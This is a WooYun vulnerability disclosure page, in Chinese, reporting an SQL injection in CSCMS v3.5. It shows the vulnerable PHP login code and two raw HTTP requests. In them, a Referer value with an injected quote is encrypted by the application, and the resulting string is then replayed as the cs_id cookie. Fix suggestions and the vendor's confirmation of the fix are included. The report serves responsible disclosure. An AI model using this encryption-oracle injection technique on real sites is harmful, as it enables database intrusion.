程氏舞曲CMS某泄露，导致sql注入 | wooyun-2014-080370| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-080370

漏洞标题：程氏舞曲CMS某泄露，导致sql注入

漏洞作者：路人甲

提交时间：2014-10-27 10:48

修复时间：2015-01-25 10:50

公开时间：2015-01-25 10:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-10-27：细节已通知厂商并且等待厂商处理中
2014-10-27：厂商已经确认，细节仅向厂商公开
2014-10-30：细节向第三方安全合作伙伴开放
2014-12-21：细节向核心白帽子及相关领域专家公开
2014-12-31：细节向普通白帽子公开
2015-01-10：细节向实习白帽子公开
2015-01-25：细节向公众公开

简要描述：

程氏舞曲CMS某泄露，导致严重问题

详细说明：

这个厂商非常给力，作为白帽子，也非常乐意～！
cookie加密后的字符泄漏。可以替换其他字段，导致SQL等，严重漏洞。
文件：C:\WWW\cscms_v3.5_utf8\app\controllers\open.php

//第三方登入入口
	public function login()
	{
              if(CS_Appmode==2) exit($this->CsdjSkins->Msg_url('第三方登入已经关闭！',Web_Path));
              $urldata['log_fhurl']=$_SERVER['HTTP_REFERER'];//泄漏点
              $urldata['log_state']=md5(uniqid(rand(), TRUE)); //CSRF protection;
              $this->session->set_userdata($urldata);
              $ac = $this->security->xss_clean($this->uri->segment(3));   //方式
              $log_url="http://denglu.chshcms.com/denglu?ac=".$ac."&appid=".CS_Appid."&redirect_uri=".site_url("open/callback")."&state=".$urldata['log_state']."&getdate=".time();
              header("Location: $log_url"); 
	}

我们提交如下，看一下，程序加密后的字符。

GET /cscms_v3.5_utf8/index.php/open/login/qq HTTP/1.1
Host: 192.168.1.201
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: xxoo'

可以看到加密后的字符：log_fhurl=L8kxDzdqKNy9%2F2Qs0g
利用这个功能，加密我们想要的任意代码。
替换其他地方就构成注入。

GET /cscms_v3.5_utf8/index.php/user/ulog/index/user HTTP/1.1
Host: 192.168.1.201
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://192.168.1.201/cscms_v3.5_utf8/index.php/user/
Cookie: cs_id=L8kxDzdqKNy9%2F2Qs0g

漏洞证明：

修复方案：

方案1：加密过程加入字段的判断，使得不能替换使用
方案2：调用cookie的后，在 addslashes 一下。
或者有其他办法，共同进步。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-10-27 12:04

厂商回复：

经过检测，漏洞确实存在，已经修复，再次感谢您的检测~!

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-080370

漏洞标题：程氏舞曲CMS某泄露，导致sql注入

相关厂商：chshcms.com

漏洞作者：路人甲

提交时间：2014-10-27 10:48

修复时间：2015-01-25 10:50

公开时间：2015-01-25 10:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-080370

漏洞标题：程氏舞曲CMS某泄露，导致sql注入

相关厂商：chshcms.com

漏洞作者： 路人甲

提交时间：2014-10-27 10:48

修复时间：2015-01-25 10:50

公开时间：2015-01-25 10:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-080370"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云